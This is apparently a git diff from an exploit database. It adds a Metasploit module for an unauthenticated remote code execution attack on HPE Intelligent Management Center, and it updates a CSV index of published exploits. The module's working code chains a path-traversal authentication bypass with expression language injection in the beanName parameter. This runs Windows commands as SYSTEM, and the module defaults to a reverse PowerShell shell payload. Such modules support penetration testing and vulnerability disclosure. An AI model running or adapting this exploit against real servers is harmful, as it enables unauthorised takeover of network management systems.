'HPE iMC EL Injection Unauthenticated RCE', + 'Description' => %q{ + This module exploits an expression language injection +vulnerablity, along with + an authentication bypass vulnerability in Hewlett Packard +Enterprise Intelligent + Management Center before version 7.3 E0504P04 to achieve +remote code execution. + + The HP iMC server suffers from multiple vulnerabilities allows +unauthenticated + attacker to execute arbitrary Expression Language via the +beanName parameter, + allowing execution of arbitrary operating system commands as +SYSTEM. This service + listens on TCP port 8080 and 8443 by default. + + This module has been tested successfully on iMC PLAT v7.3 +(E0504P02) on Windows + 2k12r2 x64 (EN). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mr_me', # Discovery + 'trendytofu' # Metasploit + ], + 'References' => + [ + ['CVE', '2017-8982'], + ['ZDI', '18-139'], + ['URL', +'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03809en_us'], + ['CVE', '2017-12500'], + ['ZDI', '17-663'], + ['URL', +'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03768en_us'] + ], + 'Platform' => 'win', + 'Arch' => ARCH_CMD, + 'Targets' => [ + [ 'Windows', + { + 'Arch' => [ ARCH_CMD], + 'Platform' => 'win' + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 25 2018', + 'DefaultOptions' => + { + 'Payload' => 'cmd/windows/reverse_powershell' + }, + 'DefaultTarget' => 0)) + register_options [Opt::RPORT(8080)] + end + + def check + res = send_request_raw({'uri' => '/imc/login.jsf' }) + + return CheckCode::Detected if res && res.code == 200 + + CheckCode::Unknown + end + + def get_payload(cmd) + %q|facesContext.getExternalContext().redirect(%22%22.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22var%20proc=new%20java.lang.ProcessBuilder[%5C%22(java.lang.String[])%5C%22]([%5C%22cmd.exe%5C%22,%5C%22/c%5C%22,%5C%22|+cmd+%q|%5C%22]).start();%22))| + end + + def execute_command(payload) + res = send_request_raw({ 'uri' => +"/imc/primepush/%2e%2e/ict/export/ictExpertDownload.xhtml?beanName=#{payload}" +}) + fail_with(Msf::Module::Failure::UnexpectedReply, "Injection +failed") if res && res.code != 302 + print_good "Command injected successfully!" + end + + def exploit + cmd = payload.encoded + cmd.gsub!('cmd.exe /c ','') + cmd = Rex::Text.uri_encode(cmd) + + print_status "Sending payload..." + execute_command get_payload cmd + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f4d8d6993..b8976d0d7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5313,7 +5313,7 @@ id,file,description,date,author,type,platform,port 40787,exploits/windows/dos/40787.html,"Microsoft Edge - 'Array.splice' Heap Overflow",2016-11-18,"Google Security Research",dos,windows, 40779,exploits/windows/dos/40779.py,"Moxa SoftCMS 1.5 - Denial of Service (PoC)",2016-11-18,"Zhou Yu",dos,windows, 40784,exploits/windows/dos/40784.html,"Microsoft Edge - 'FillFromPrototypes' Type Confusion",2016-11-18,"Google Security Research",dos,windows, -40785,exploits/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",dos,windows, +40785,exploits/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Information Leak",2016-11-18,"Google Security Research",dos,windows, 40786,exploits/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",dos,windows, 40790,exploits/linux/dos/40790.txt,"Palo Alto Networks PanOS - appweb3 Stack Buffer Overflow",2016-11-18,"Google Security Research",dos,linux, 40793,exploits/windows/dos/40793.html,"Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)",2016-11-21,Security-Assessment.com,dos,windows, @@ -5973,6 +5973,7 @@ id,file,description,date,author,type,platform,port 44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows, 44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios, 44641,exploits/linux/dos/44641.c,"Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall",2018-05-17,"Google Security Research",dos,linux, +44653,exploits/windows/dos/44653.js,"Microsoft Edge Chakra JIT - Bound Check Elimination Bug",2018-05-18,"Google Security Research",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9708,14 +9709,18 @@ id,file,description,date,author,type,platform,port 44564,exploits/windows/local/44564.py,"LibreOffice/Open Office - '.odt' Information Disclosure",2018-05-02,"Richard Davy",local,windows, 44565,exploits/windows/local/44565.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)",2018-05-02,"Marwan Shamel",local,windows, 44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows, -44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows, -44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64, +44581,exploits/windows/local/44581.c,"Microsoft Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows, +44586,exploits/windows_x86-64/local/44586.rb,"Microsoft Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64, 44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows, 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux, 44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows, 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows, 44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows, 44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux, +44644,exploits/hardware/local/44644.txt,"Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)",2017-03-31,unknownv2,local,hardware, +44649,exploits/windows/local/44649.py,"Prime95 29.4b8 - Stack Buffer Overflow (SEH)",2018-05-18,crash_manucoot,local,windows, +44652,exploits/linux/local/44652.py,"DynoRoot DHCP - Client Command Injection",2018-05-18,"Kevin Kirsche",local,linux, +44654,exploits/linux/local/44654.rb,"Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)",2018-05-18,Metasploit,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16146,7 +16151,7 @@ id,file,description,date,author,type,platform,port 40949,exploits/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80 40963,exploits/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",remote,linux,22 40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows, -40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows, +40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows, 41003,exploits/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Remote Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",remote,windows, 41013,exploits/linux/remote/41013.txt,"Ansible 2.1.4/2.2.1 - Command Execution",2017-01-09,Computest,remote,linux, 41041,exploits/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (Metasploit)",2017-01-13,Metasploit,remote,linux, @@ -16217,7 +16222,7 @@ id,file,description,date,author,type,platform,port 43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows, 43936,exploits/windows/remote/43936.py,"Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)",2018-02-01,"Daniel Teixeira",remote,windows, 43939,exploits/multiple/remote/43939.rb,"BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)",2018-02-01,Metasploit,remote,multiple, -43970,exploits/windows/remote/43970.rb,"Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)",2018-02-05,Metasploit,remote,windows, +43970,exploits/windows/remote/43970.rb,"Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)",2018-02-05,Metasploit,remote,windows, 43982,exploits/hardware/remote/43982.txt,"Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access",2018-02-01,bashis,remote,hardware, 43983,exploits/hardware/remote/43983.py,"Geovision Inc. IP Camera & Video - Remote Command Execution",2018-02-01,bashis,remote,hardware, 43984,exploits/multiple/remote/43984.txt,"Axis SSI - Remote Command Execution / Read Files",2017-10-20,bashis,remote,multiple, @@ -16495,6 +16500,7 @@ id,file,description,date,author,type,platform,port 44638,exploits/windows/remote/44638.txt,"Nanopool Claymore Dual Miner 7.3 - Remote Code Execution",2018-05-17,ReverseBrain,remote,windows, 44642,exploits/linux/remote/44642.rb,"Jenkins CLI - HTTP Java Deserialization (Metasploit)",2018-05-17,Metasploit,remote,linux,8080 44643,exploits/multiple/remote/44643.rb,"Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)",2018-05-17,Metasploit,remote,multiple,8080 +44648,exploits/windows/remote/44648.rb,"HPE iMC 7.3 - Remote Code Execution (Metasploit)",2018-05-18,TrendyTofu,remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39329,3 +39335,9 @@ id,file,description,date,author,type,platform,port 44637,exploits/hardware/webapps/44637.py,"Intelbras NCLOUD 300 1.0 - Authentication bypass",2018-05-17,"Pedro Aguiar",webapps,hardware, 44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php, 44640,exploits/linux/webapps/44640.txt,"Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery",2018-05-17,t4rkd3vilz,webapps,linux, +44645,exploits/php/webapps/44645.txt,"Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php, +44646,exploits/php/webapps/44646.txt,"Monstra CMS before 3.0.4 - Cross-Site Scripting",2018-05-18,"Berk Dusunur",webapps,php, +44647,exploits/linux/webapps/44647.txt,"SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure",2018-05-18,"Richard Alviarez",webapps,linux, +44651,exploits/php/webapps/44651.txt,"Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php, +44650,exploits/hardware/webapps/44650.txt,"Cisco SA520W Security Appliance - Path Traversal",2018-05-18,"Nassim Asrir",webapps,hardware, +44655,exploits/linux/webapps/44655.txt,"SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion",2018-05-18,"Richard Alviarez",webapps,linux,